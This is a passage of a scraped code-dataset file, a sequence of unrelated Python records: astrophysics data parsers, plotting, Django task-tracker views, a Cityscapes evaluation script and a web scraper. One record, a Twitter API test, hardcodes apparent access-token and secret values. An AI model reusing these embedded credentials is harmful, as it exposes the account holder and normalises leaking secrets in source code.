:\",filelength/10e5,\"MB\")\n\n\n if download : \n filename=url.split(\"/\")[-1]\n if os.path.exists(filename) :\n return print(\"File already exists .\")\n r = requests.get(url, stream=True)\n with open(filename, 'wb') as f:\n pbar = tqdm(total=int(filelength/1024))\n for chunk in r.iter_content(chunk_size=1024):\n if chunk: # filter out keep-alive new chunks\n pbar.update ()\n f.write(chunk)\n\n\n\n\n\ndef parse_header(output,start=0,end=50) : #start and end can be changed if a header is expcted to be beyond default range\n \n\n pattern=\"![A-Za-z]+.+\"\n p=re.compile(pattern)\n\n keys={}\n count=[]\n for x in range(start,min(len(output),end)) :\n temp=p.findall(output[x])\n if temp != [] :\n value=output[x].split(\" \")[0]\n keys[temp[0][1:]]=value\n count.append(x)\n \n return keys,count[0],count[-1]\n\n\nclass CMFGENEnergyLevelsParser():\n\n '''\n modelled on the base parser class , yet to be inherited \n \n attributes : \n meta = returns meta header data of the file\n load method =loads the compressed database and searches for the passed file (extraaction of file is not required )\n fname= represents the filename passed at class insantiation \n base = represents a panda dataframe composed of the parsed data \n \n Note : \n This parser has been re written and the logic has been changed and the find row method been deprecated to optimize the code \n to be excecuted within one pass of the file .\n \n Important Points :\n The to_hdf() function will produce the output in your current working directory .\n To specfiy a path where the output has to be taken pass the specifc file path to the fname parameter in the function call.\n ''' \n def __init__ (self,fname) :\n\n self.load(fname)\n\n def load(self,fname) :\n base_filename=\"atomic_data_15nov16.tar.gz\"\n t = tarfile.open(base_filename,'r:gz')\n if not fname.startswith(\"a\") :\n temp=fname.find('a')\n fname=fname[temp:]\n\n\n\n file=t.extractfile(fname)\n #output will contain all of the file content line by line \n output=list(map(lambda x: x.strip().decode(\"utf-8\"),file.readlines()))\n meta,cstart,skip=parse_header(output)\n new_output=list(map(lambda x: x.split(),output))\n columns=[x for x in new_output[cstart-3] if x!=\" \"]\n \n n=int(meta['Number of energy levels'])\n \n df = pd.DataFrame(new_output[skip+2:skip+n+2],columns=columns,index=range(0,n))\n \n\n \n self.meta=meta\n self.base=df\n self.fname=fname\n self.columns=columns\n\n def to_hdf(self, key='/energy_levels',fname=working_directory):\n if not self.base.empty:\n with pd.HDFStore('{}.h5'.format(fname), 'a') as f:\n f.put(key, self.base)\n f.get_storer(key).attrs.metadata = self.meta\n\n\nclass CMFGENOscillatorStrengthsParser():\n\n\n '''\n modelled on the base parser class , yet to be inherited \n \n attributes : \n meta = returns meta header data of the file\n load method =loads the compressed database and searches for the passed file (extraaction of file is not required )\n fname= represents the filename passed at class insantiation \n base = represents a panda dataframe composed of the parsed data \n \n Note : \n This parser has been re written and the logic has been changed and the find row method been deprecated to optimize the code \n to be excecuted within one pass of the file .\n \n Important Points :\n The to_hdf() function will produce the output in your current working directory .\n To specfiy a path where the output has to be taken pass the specifc file path to the fname parameter in the function call.\n '''\n def __init__ (self,fname) :\n\n self.load(fname)\n\n def load(self,fname) :\n base_filename=\"atomic_data_15nov16.tar.gz\"\n t = tarfile.open(base_filename,'r:gz')\n if not fname.startswith(\"a\") :\n temp=fname.find('a')\n fname=fname[temp:]\n file=t.extractfile(fname)\n #output will contain all of the file content line by line \n output=list(map(lambda x: x.strip().decode(\"utf-8\"),file.readlines()))\n meta,cstart,skip=parse_header(output)\n new_output=list(map(lambda x: x.split(),output))\n columns1 = ['State A', 'State B', 'f', 'A','Lam(A)', 'i', 'j', 'Lam(obs)', '% Acc']\n columns2=['State A', 'State B', 'f', 'A','Lam(A)', 'i', 'j', 'Transition Number']\n \n \n n=int(meta['Number of energy levels'])\n m=int(meta['Number of transitions'])\n cstart=0\n\n for start in range(skip+n,skip+n+100) :\n if len(new_output[start])<1 :\n continue\n\n if new_output[start][0]==\"Transition\" :\n\n cstart=start\n break\n\n for x in new_output[cstart+2:cstart+2+m+1]:\n i=x[0].find(\"-\")\n try :\n if i !=-1 :\n x.insert(1,x[0][i+1:])\n x[0]=x[0][:i]\n \n else :\n x[1]=x[1][1:]\n \n if x[5].endswith(\"-\") :\n x[5]=x[5][:-1]\n if x[8]==\"|\" :\n x[7]=np.nan\n else :\n x[7]=x[8]\n if len(x)==9+1 :\n if x[9]== \"|\" :\n x[8]=np.nan\n else :\n x[8]=x[9]\n x.pop(9)\n elif len(x)==10 +1:\n if x[9]==\"|\" :\n x[8]=np.nan\n\n else :\n x[8]=x[9]\n x.pop(10)\n x.pop(9)\n \n elif len(x)==11+1 :\n x[7]=x[8]\n x[8]=x[10]\n x.pop(11)\n \n x.pop(10)\n x.pop(9)\n\n except IndexError : #check index error \n\n pass\n\n if len(new_output[cstart+2])==9 :\n columns=columns1\n else :\n columns=columns2\n df = pd.DataFrame(new_output[cstart+2:cstart+2+m+1],columns=columns,index=range(0,m))\n \n\n \n self.meta=meta\n self.base=df\n self.fname=fname\n self.columns=columns\n\n\n def to_hdf(self, key='/oscillator_strengths',fname=working_directory):\n if not self.base.empty:\n with pd.HDFStore('{}.h5'.format(fname), 'a') as f:\n f.put(key, self.base)\n f.get_storer(key).attrs.metadata = self.meta\n\n\n", "sub_path": "carsus/io/cmfgen/oscfiles.py", "file_name": "oscfiles.py", "file_ext": "py", "file_size_in_byte": 6687, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "os.getcwd", "line_number": 12, "usage_type": "call"}, {"api_name": "requests.head", "line_number": 19, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 33, "usage_type": "call"}, {"api_name": "os.path", "line_number": 33, "usage_type": "attribute"}, {"api_name": "requests.get", "line_number": 35, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 37, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 51, "usage_type": "call"}, {"api_name": "tarfile.open", "line_number": 90, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 106, "usage_type": "call"}, {"api_name": "pandas.HDFStore", "line_number": 117, "usage_type": "call"}, {"api_name": "tarfile.open", "line_number": 148, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 187, "usage_type": "attribute"}, {"api_name": "numpy.nan", "line_number": 192, "usage_type": "attribute"}, {"api_name": "numpy.nan", "line_number": 198, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 221, "usage_type": "call"}, {"api_name": "pandas.HDFStore", "line_number": 233, "usage_type": "call"}]} +{"seq_id": "8832747", "text": "import matplotlib.pyplot as plt\nimport numpy as np\n\ndef plot_persistence(data,params):\n \n \"\"\"Arguments in are (0) a dictionary and (1) parameters\"\"\"\n \n # Extract parameters\n dim = params['dim']\n thr = params['max_persistence']\n \n # Plot figure\n fig = plt.figure(figsize = (8,8))\n ax = fig.add_subplot(1,1,1)\n ax.plot([0,thr],[0,thr],'k')\n for d in range(dim+1):\n data_array = np.array(data[d])\n ax.plot(data_array[:,0],data_array[:,1],'x',label='dim = '+str(d),clip_on=False)\n data_array = []\n ax.set_xlabel('birth')\n ax.set_ylabel('death')\n ax.axis([0,thr,0,thr])\n ax.legend(numpoints=1,loc=4)\n \n # Create title with parameter info\n title = params.copy()\n del title['dim']\n del title['max_persistence']\n string = 'persistence diagram with the following parameters:\\n'\n j = 1\n k = 1\n for i in sorted(title):\n string += str(i) + ' = ' + str(title[i])\n if k < len(title):\n string += ','\n if j > 3:\n j = 1\n string += '\\n'\n else:\n j += 1\n string += ' '\n k += 1\n ax.set_title(string)\n \n return fig\n ", "sub_path": "scripts/PlotPersistence.py", "file_name": "PlotPersistence.py", "file_ext": "py", "file_size_in_byte": 1216, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "matplotlib.pyplot.figure", "line_number": 13, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 13, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 17, "usage_type": "call"}]} +{"seq_id": "126398391", "text": "from Leitor_de_Arquivos_CSV import *\nfrom datetime import *\nimport os\n\ndef criar_banco_de_dados_projeto_para_indicium_e_utilizalo():\n caminho = 'C:/Users/Usuario/Desktop/Organização da Area de Trabalho Zero ILumi' \\\n '/Teste pratico indicium/code-challenge/data/Tabelas' \\\n '/Comando_para_criar_e_usar_banco_de_dados_Projeto_Indicium.sql'\n arquivo = open(caminho, 'w')\n arquivo.write('CREATE DATABASE Projeto_Indicium\\n'\n 'USE Projeto_Indicium')\n\n\n\n\ndef criar_comandos_de_criacao_da_tabela_order_details():\n caminho = 'C:/Users/Usuario/Desktop/Nova pasta/Tabela_order_details.sql'\n arquivo = open(caminho, 'w')\n arquivo.write('CREATE TABLE order_details\\n'\n '(\\n'\n '{Campos}\\n'\n ')\\n'\n ''.format(Campos=ler_campos_do_arquivo_csv_para_CREATE_TABLE()))\n\n\ndef criar_registos_da_tabela_order_details():\n caminho = 'C:/Users/Usuario/Desktop/Nova pasta/Registros_da_tabela_order_details.sql'\n arquivo = open(caminho, 'w')\n arquivo.write('{ler_registros_da_tabela_order_details} SELECT * FROM order_details'\n ''.format(ler_registros_da_tabela_order_details=ler_registros_da_tabela_order_details()))\n\n\n# Esta função atraves da variavel hoje\n# atribui a si a data atual que e retornada\n# pela função do datatime datetime.now()\n# depois a função retorna a data atual formatada\n# em str de tempo com o dia-mes-ano_completo\n# exemplo 10-09-2021\ndef imprimir_dia_atual():\n hoje = datetime.now()\n return hoje.strftime('%d-%m-%Y')\n\n\ndef criar_pasta_e_arquivo_com_a_data_atual_para_order_detais():\n diretorio = imprimir_dia_atual()\n diretorio_caminho = 'C:/Users/Usuario/Desktop/Organização da Area de Trabalho Zero ILumi/' \\\n 'Teste pratico indicium/code-challenge/data/' \\\n 'Tabela_order_details/{diretorio}'.format(diretorio=diretorio)\n caminho = os.path.join(diretorio, diretorio_caminho)\n modo = 0o166\n try:\n os.mkdir(caminho, modo)\n except OSError:\n print('Não foi possivel criar a Pasta {nome_da_pasta}'\n ' possivelmente ela ja existe.'.format(nome_da_pasta=diretorio))\n else:\n print('Pasta {nome_da_pasta} criada com sucesso'.format(nome_da_pasta=diretorio))\n caminho_do_arquivo = 'C:/Users/Usuario/Desktop/Organização da Area de Trabalho Zero ILumi' \\\n '/Teste pratico indicium/code-challenge/data/' \\\n 'Tabela_order_details/{diretorio}' \\\n '/order_detais.txt'.format(diretorio=diretorio)\n arquivo = open(caminho_do_arquivo, 'w')\n arquivo.write(\"aaaa\")\n\n\nif __name__ == '__main__':\n # criar_comandos_de_criacao_da_tabela_order_details()\n # criar_registos_da_tabela_order_details()\n # criar_pasta_e_arquivo_com_a_data_atual_para_order_detais()\n criar_banco_de_dados_projeto_para_indicium_e_utilizalo()\n", "sub_path": "code-challenge/projeto_para_indicium/Criador_de_Arquivos_sql.py", "file_name": "Criador_de_Arquivos_sql.py", "file_ext": "py", "file_size_in_byte": 2968, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "datetime.now", "line_number": 40, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 49, "usage_type": "call"}, {"api_name": "os.path", "line_number": 49, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 52, "usage_type": "call"}]} +{"seq_id": "653691380", "text": "from sacred import Experiment\nfrom sacred.utils import apply_backspaces_and_linefeeds\nfrom .common import get_observer, experiment_context, clear_directory, load_data\nimport os\nimport sys\nimport logging\nfrom zipfile import ZipFile\nimport tensorflow as tf\nimport bdlb\nfrom tqdm import tqdm\nimport tensorflow_datasets as tfds\n\nfrom .utils import ExperimentData\nfrom fs.data.utils import load_gdrive_file\nfrom fs.data.augmentation import crop_multiple\n\nex = Experiment()\nex.capture_out_filter = apply_backspaces_and_linefeeds\nex.observers.append(get_observer())\n\n@ex.command\ndef saved_model(testing_dataset, model_id, _run, _log, batching=True):\n # testing_dataset is not used, but useful to keep config file consistent with other\n # tests\n data = tfds.load(name='cityscapes', split='validation',\n data_dir='/cluster/work/riner/users/blumh/tensorflow_datasets')\n label_lookup = tf.constant(\n [-1, -1, -1, -1, -1, -1, -1, 0, 1, -1, -1, 2, 3, 4, -1, -1, -1, 5, -1, 6, 7, 8, 9,\n 10, 11, 12, 13, 14, 15, -1, -1, 16, 17, 18])\n def label_lookup_map(batch):\n batch['segmentation_label'] = tf.gather_nd(\n label_lookup,\n tf.cast(batch['segmentation_label'], tf.int32))\n return batch\n data = data.map(label_lookup_map)\n if batching:\n data = data.batch(1)\n\n ZipFile(load_gdrive_file(model_id, 'zip')).extractall('/tmp/extracted_module')\n tf.compat.v1.enable_resource_variables()\n net = tf.saved_model.load('/tmp/extracted_module')\n\n m = tf.keras.metrics.MeanIoU(num_classes=19)\n for batch in tqdm(data, ascii=True):\n pred = net.signatures['serving_default'](tf.cast(batch['image_left'], tf.float32))\n labels = tf.reshape(batch['segmentation_label'], [-1])\n weights = tf.where(labels == -1, 0, 1)\n labels = tf.where(labels == -1, 0, labels)\n m.update_state(labels,\n tf.reshape(pred['prediction'], [-1]),\n sample_weight=weights)\n\n _run.info['mIoU'] = m.result().numpy()\n\n\nif __name__ == '__main__':\n ex.run_commandline()\n os._exit(os.EX_OK)\n", "sub_path": "experiments/cityscapes_mIoU.py", "file_name": "cityscapes_mIoU.py", "file_ext": "py", "file_size_in_byte": 2127, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "sacred.Experiment", "line_number": 17, "usage_type": "call"}, {"api_name": "sacred.utils.apply_backspaces_and_linefeeds", "line_number": 18, "usage_type": "name"}, {"api_name": "common.get_observer", "line_number": 19, "usage_type": "call"}, {"api_name": "tensorflow_datasets.load", "line_number": 25, "usage_type": "call"}, {"api_name": "tensorflow.constant", "line_number": 27, "usage_type": "call"}, {"api_name": "tensorflow.gather_nd", "line_number": 31, "usage_type": "call"}, {"api_name": "tensorflow.cast", "line_number": 33, "usage_type": "call"}, {"api_name": "tensorflow.int32", "line_number": 33, "usage_type": "attribute"}, {"api_name": "zipfile.ZipFile", "line_number": 39, "usage_type": "call"}, {"api_name": "fs.data.utils.load_gdrive_file", "line_number": 39, "usage_type": "call"}, {"api_name": "tensorflow.compat.v1.enable_resource_variables", "line_number": 40, "usage_type": "call"}, {"api_name": "tensorflow.compat", "line_number": 40, "usage_type": "attribute"}, {"api_name": "tensorflow.saved_model.load", "line_number": 41, "usage_type": "call"}, {"api_name": "tensorflow.saved_model", "line_number": 41, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.metrics.MeanIoU", "line_number": 43, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 43, "usage_type": "attribute"}, {"api_name": "tqdm.tqdm", "line_number": 44, "usage_type": "call"}, {"api_name": "tensorflow.cast", "line_number": 45, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 45, "usage_type": "attribute"}, {"api_name": "tensorflow.reshape", "line_number": 46, "usage_type": "call"}, {"api_name": "tensorflow.where", "line_number": 47, "usage_type": "call"}, {"api_name": "tensorflow.where", "line_number": 48, "usage_type": "call"}, {"api_name": "tensorflow.reshape", "line_number": 50, "usage_type": "call"}, {"api_name": "os._exit", "line_number": 58, "usage_type": "call"}, {"api_name": "os.EX_OK", "line_number": 58, "usage_type": "attribute"}]} +{"seq_id": "583727020", "text": "import twitter\n\nfrom main_config import Config\n\napi = twitter.Api(consumer_key=Config.API_key,\n consumer_secret=Config.API_secret_key,\n access_token_key='1110445913791713280-2UYoQtPqZ5FhBX4fQfGHclShDtm64W',\n access_token_secret='M9g1nOtTyqLQ5qA72AFwwjsv6tqHfyoHTJM2ujaw5PjNj',\n tweet_mode='extended')\nstatuses = api.GetHomeTimeline(exclude_replies=True)\nprint(statuses)\n", "sub_path": "twitter_api/test.py", "file_name": "test.py", "file_ext": "py", "file_size_in_byte": 438, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "twitter.Api", "line_number": 5, "usage_type": "call"}, {"api_name": "main_config.Config.API_key", "line_number": 5, "usage_type": "attribute"}, {"api_name": "main_config.Config", "line_number": 5, "usage_type": "name"}, {"api_name": "main_config.Config.API_secret_key", "line_number": 6, "usage_type": "attribute"}, {"api_name": "main_config.Config", "line_number": 6, "usage_type": "name"}]} +{"seq_id": "637072153", "text": "# -*- coding: utf-8 -*-\n# Вашей программе на вход подается ссылка на HTML файл.\n# Вам необходимо скачать этот файл, затем найти в нем все ссылки вида и вывести список сайтов, на которые есть ссылка.\n\n# Сайтом в данной задаче будем называть имя домена вместе с именами поддоменов. То есть, это последовательность символов, которая следует сразу после символов протокола, если он есть, до символов порта или пути, если они есть.\n\n# Сайты следует выводить в алфавитном порядке.\n\n# Пример HTML файла:\n\n# \n# \n# \n# \n# \n# \n\n# Пример ответа:\n\n# mail.ru\n# neerc.ifmo.ru\n# stepic.org\n# www.ya.ru\n# ya.ru\n\nimport requests\nimport re\n# url = input()\nurl = \"http://ya.ru\"\n\nres = requests.get(url)\n# print(res.status_code)\n# print(res.headers['Content-Type'])\n# print(res.url)\nhtml = res.text\n# links = re.findall('\"((http|ftp)s?://.*?)\"', html)\n# print(links)\n\nregexp_link = r'''s]+))?)+s*|s*)/?>w+'''\npattern = re.compile(regexp_link)\nlinks = re.findall(pattern, html)\n\n#print all matches\nprint(links)\n\n# link_list = re.findall(r\"(?<=href=\\\").+?(?=\\\")|(?<=href=\\').+?(?=\\')\", html)\n# link_list = re.findall(r'href=[\\'\"]?([^\\'\" >]+)', html)\n# # for url in link_list:\n# print(link_list)\n\n\n# linkregex = re.compile('')\n# links = linkregex.findall(html)\n# # links = re.findall(r\"(.*?)\", html)\n# print(links)\n# for link in links:\n # print('href: %s, HTML text: %s' % (link[0], link[1]))", "sub_path": "stepic_py_basic_use/w3/3-3-7.py", "file_name": "3-3-7.py", "file_ext": "py", "file_size_in_byte": 2046, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "requests.get", "line_number": 31, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 40, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 41, "usage_type": "call"}]} +{"seq_id": "490654361", "text": "from django.shortcuts import render, get_object_or_404, redirect\nfrom django.views.generic import View, TemplateView\n\nfrom webapp.models import Tracker, Type, Status\nfrom webapp.forms import TrackerForm, TypeForm, StatusForm\n\nclass IndexView(TemplateView):\n template_name = 'index.html'\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['trackers'] = Tracker.objects.all()\n return context\n\nclass TaskTrackerView(TemplateView):\n template_name = 'TaskTrack.html'\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n task_track_pk = self.kwargs.get('pk')\n context['tracker'] = get_object_or_404(Tracker, pk=task_track_pk)\n return context\n\n\nclass TaskTrackerCraeteView(View):\n def get(self, request, *args, **kwargs):\n form = TrackerForm()\n context = {\n 'form': form\n }\n return render(request, 'create.html', context)\n\n def post(self, request, *args, **kwargs):\n form = TrackerForm(data=request.POST)\n if form.is_valid():\n Tracker.objects.create(\n summary=form.cleaned_data['summary'],\n description=form.cleaned_data['description'],\n status=form.cleaned_data['status'],\n type=form.cleaned_data['type']\n )\n return redirect('index')\n else:\n return render(request, 'create.html', context={'form': form})\n\n\nclass TaskTrackerUpdateView(View):\n def get(self, request, *args, **kwargs):\n task_tracker = self.get_odject(self.kwargs.get('pk'))\n form = TrackerForm(data = {\n 'summary':task_tracker.summary,\n 'description':task_tracker.description,\n 'status':task_tracker.status,\n 'type':task_tracker.type\n })\n context = {\n 'task_tracker': task_tracker,\n 'form': form\n }\n return render(request, 'update.html', context)\n\n def post(self, request, *args, **kwargs):\n task_tracker = self.get_odject(self.kwargs.get('pk'))\n form = TrackerForm(data=request.POST)\n if form.is_valid():\n task_tracker.summary = request.POST.get('summary')\n task_tracker.description = request.POST.get('description')\n task_tracker.Status = request.POST.get('status')\n task_tracker.Type = request.POST.get('type')\n task_tracker.save()\n return redirect('index')\n else:\n return render(request, 'update.html', context={'task_tracker': task_tracker, 'form': form})\n\n def get_odject(self, pk):\n task_tracker = get_object_or_404(Tracker, pk = pk)\n return task_tracker\n\n\nclass TaskTrackerDeleteView(View):\n def get(self, request, *args, **kwargs):\n task_tracker = self.get_odject(self.kwargs.get('pk'))\n context = {'task_tracker': task_tracker}\n return render(request, 'delete.html', context)\n\n def post(self, request, *args, **kwargs):\n task_tracker = self.get_odject(self.kwargs.get('pk'))\n task_tracker.delete()\n return redirect('index')\n\n def get_odject(self, pk):\n task_tracker = get_object_or_404(Tracker, pk = pk)\n return task_tracker\n\ndef types_list(request, *args, **kwargs):\n types = Type.objects.all()\n return render(request, 'types_ls.html', context={'types': types})\n\ndef status_list(request, *args, **kwargs):\n statuses = Status.objects.all()\n return render(request, 'status_ls.html', context={'statuses': statuses})\n\ndef types_create_view(request, *args, **kwargs):\n if request.method == 'GET':\n form = TypeForm()\n return render(request, 'create_type.html', context={'form': form})\n elif request.method == 'POST':\n form = TypeForm(data=request.POST)\n if form.is_valid():\n Type.objects.create(type=form.cleaned_data['type'])\n return redirect('type_ls')\n else:\n return render(request, 'create_type.html', context={'form': form})\n\ndef statuses_create_view(request, *args, **kwargs):\n if request.method == 'GET':\n form = StatusForm()\n return render(request, 'create_status.html', context={'form': form})\n elif request.method == 'POST':\n form = StatusForm(data=request.POST)\n if form.is_valid():\n Status.objects.create(type=form.cleaned_data['status'])\n return redirect('status_ls')\n else:\n return render(request, 'create_status.html', context={'form': form})\n\n\ndef types_edit_view(request, pk):\n type = get_object_or_404(Type, pk=pk)\n if request.method == 'GET':\n form = TypeForm(data={'type' : type.type})\n return render(request, 'update_type.html', context={'form': form, 'type': type})\n elif request.method == 'POST':\n form = TypeForm(data=request.POST)\n if form.is_valid():\n type.type = request.POST.get('type')\n type.save()\n return redirect('type_ls')\n else:\n return render(request, 'update_type.html', context={'type': type, 'form': form})\n return redirect('type_ls')\n\n\ndef statuses_edit_view(request, pk):\n statuses = get_object_or_404(Status, pk=pk)\n if request.method == 'GET':\n form = StatusForm(data={'status' : statuses.status})\n return render(request, 'update_status.html', context={'form': form, 'status': statuses})\n elif request.method == 'POST':\n form = StatusForm(data=request.POST)\n if form.is_valid():\n statuses.status = request.POST.get('status')\n statuses.save()\n return redirect('status_ls')\n else:\n return render(request, 'update_status.html', context={'status': statuses, 'form': form})\n return redirect('status_ls')\n\n\ndef type_delete_view(request, pk):\n type = get_object_or_404(Type, pk=pk)\n if request.method == 'GET':\n return render(request, 'delete_type.html', context={'type': type})\n elif request.method == 'POST':\n type.delete()\n return redirect('type_ls')\n\n\ndef statuses_delete_view(request, pk):\n statuses = get_object_or_404(Status, pk=pk)\n if request.method == 'GET':\n return render(request, 'delete_status.html', context={'status': statuses})\n elif request.method == 'POST':\n statuses.delete()\n return redirect('status_ls')\n", "sub_path": "source/webapp/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 6436, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "django.views.generic.TemplateView", "line_number": 7, "usage_type": "name"}, {"api_name": "webapp.models.Tracker.objects.all", "line_number": 12, "usage_type": "call"}, {"api_name": "webapp.models.Tracker.objects", "line_number": 12, "usage_type": "attribute"}, {"api_name": "webapp.models.Tracker", "line_number": 12, "usage_type": "name"}, {"api_name": "django.views.generic.TemplateView", "line_number": 15, "usage_type": "name"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 21, "usage_type": "call"}, {"api_name": "webapp.models.Tracker", "line_number": 21, "usage_type": "argument"}, {"api_name": "django.views.generic.View", "line_number": 25, "usage_type": "name"}, {"api_name": "webapp.forms.TrackerForm", "line_number": 27, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 31, "usage_type": "call"}, {"api_name": "webapp.forms.TrackerForm", "line_number": 34, "usage_type": "call"}, {"api_name": "webapp.models.Tracker.objects.create", "line_number": 36, "usage_type": "call"}, {"api_name": "webapp.models.Tracker.objects", "line_number": 36, "usage_type": "attribute"}, {"api_name": "webapp.models.Tracker", "line_number": 36, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 42, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 44, "usage_type": "call"}, {"api_name": "django.views.generic.View", "line_number": 47, "usage_type": "name"}, {"api_name": "webapp.forms.TrackerForm", "line_number": 50, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 60, "usage_type": "call"}, {"api_name": "webapp.forms.TrackerForm", "line_number": 64, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 71, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 73, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 76, "usage_type": "call"}, {"api_name": "webapp.models.Tracker", "line_number": 76, "usage_type": "argument"}, {"api_name": "django.views.generic.View", "line_number": 80, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 84, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 89, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 92, "usage_type": "call"}, {"api_name": "webapp.models.Tracker", "line_number": 92, "usage_type": "argument"}, {"api_name": "webapp.models.Type.objects.all", "line_number": 96, "usage_type": "call"}, {"api_name": "webapp.models.Type.objects", "line_number": 96, "usage_type": "attribute"}, {"api_name": "webapp.models.Type", "line_number": 96, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 97, "usage_type": "call"}, {"api_name": "webapp.models.Status.objects.all", "line_number": 100, "usage_type": "call"}, {"api_name": "webapp.models.Status.objects", "line_number": 100, "usage_type": "attribute"}, {"api_name": "webapp.models.Status", "line_number": 100, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 101, "usage_type": "call"}, {"api_name": "webapp.forms.TypeForm", "line_number": 105, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 106, "usage_type": "call"}, {"api_name": "webapp.forms.TypeForm", "line_number": 108, "usage_type": "call"}, {"api_name": "webapp.models.Type.objects.create", "line_number": 110, "usage_type": "call"}, {"api_name": "webapp.models.Type.objects", "line_number": 110, "usage_type": "attribute"}, {"api_name": "webapp.models.Type", "line_number": 110, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 111, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 113, "usage_type": "call"}, {"api_name": "webapp.forms.StatusForm", "line_number": 117, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 118, "usage_type": "call"}, {"api_name": "webapp.forms.StatusForm", "line_number": 120, "usage_type": "call"}, {"api_name": "webapp.models.Status.objects.create", "line_number": 122, "usage_type": "call"}, {"api_name": "webapp.models.Status.objects", "line_number": 122, "usage_type": "attribute"}, {"api_name": "webapp.models.Status", "line_number": 122, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 123, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 125, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 129, "usage_type": "call"}, {"api_name": "webapp.models.Type", "line_number": 129, "usage_type": "argument"}, {"api_name": "webapp.forms.TypeForm", "line_number": 131, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 132, "usage_type": "call"}, {"api_name": "webapp.forms.TypeForm", "line_number": 134, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 138, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 140, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 141, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 145, "usage_type": "call"}, {"api_name": "webapp.models.Status", "line_number": 145, "usage_type": "argument"}, {"api_name": "webapp.forms.StatusForm", "line_number": 147, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 148, "usage_type": "call"}, {"api_name": "webapp.forms.StatusForm", "line_number": 150, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 154, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 156, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 157, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 161, "usage_type": "call"}, {"api_name": "webapp.models.Type", "line_number": 161, "usage_type": "argument"}, {"api_name": "django.shortcuts.render", "line_number": 163, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 166, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 170, "usage_type": "call"}, {"api_name": "webapp.models.Status", "line_number": 170, "usage_type": "argument"}, {"api_name": "django.shortcuts.render", "line_number": 172, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 175, "usage_type": "call"}]} +{"seq_id": "242512788", "text": "from django.shortcuts import render\nfrom pyecharts import Bar, Pie, Line, Scatter, Boxplot, Radar, WordCloud\nimport numpy as np\nimport pandas as pd\n\nREMOTE_HOST = \"https://pyecharts.github.io/assets/js\"\n\n\ndef index(request):\n return render(request, 'mysite/index.html')\n\n\ndef food_page_first(request):\n food = pd.read_csv('../data/food.csv')\n type_info = food.groupby('type').name.count().sort_values(ascending=False)\n type = [i for i in type_info.index]\n type_count = [i for i in type_info.values]\n type_bar = Bar('各菜系商家数量', width='1000px', title_pos='center', title_top='bottom')\n type_bar.add('数量', type, type_count, is_label_show=True, bar_category_gap='30%', xaxis_rotate=50)\n zone_info = food.groupby('zone').name.count().sort_values(ascending=False).head(15)\n zone = [i for i in zone_info.index]\n zone_count = [i for i in zone_info.values]\n zone_bar = Bar('各商区商家数量', title_pos='center', title_top='bottom')\n 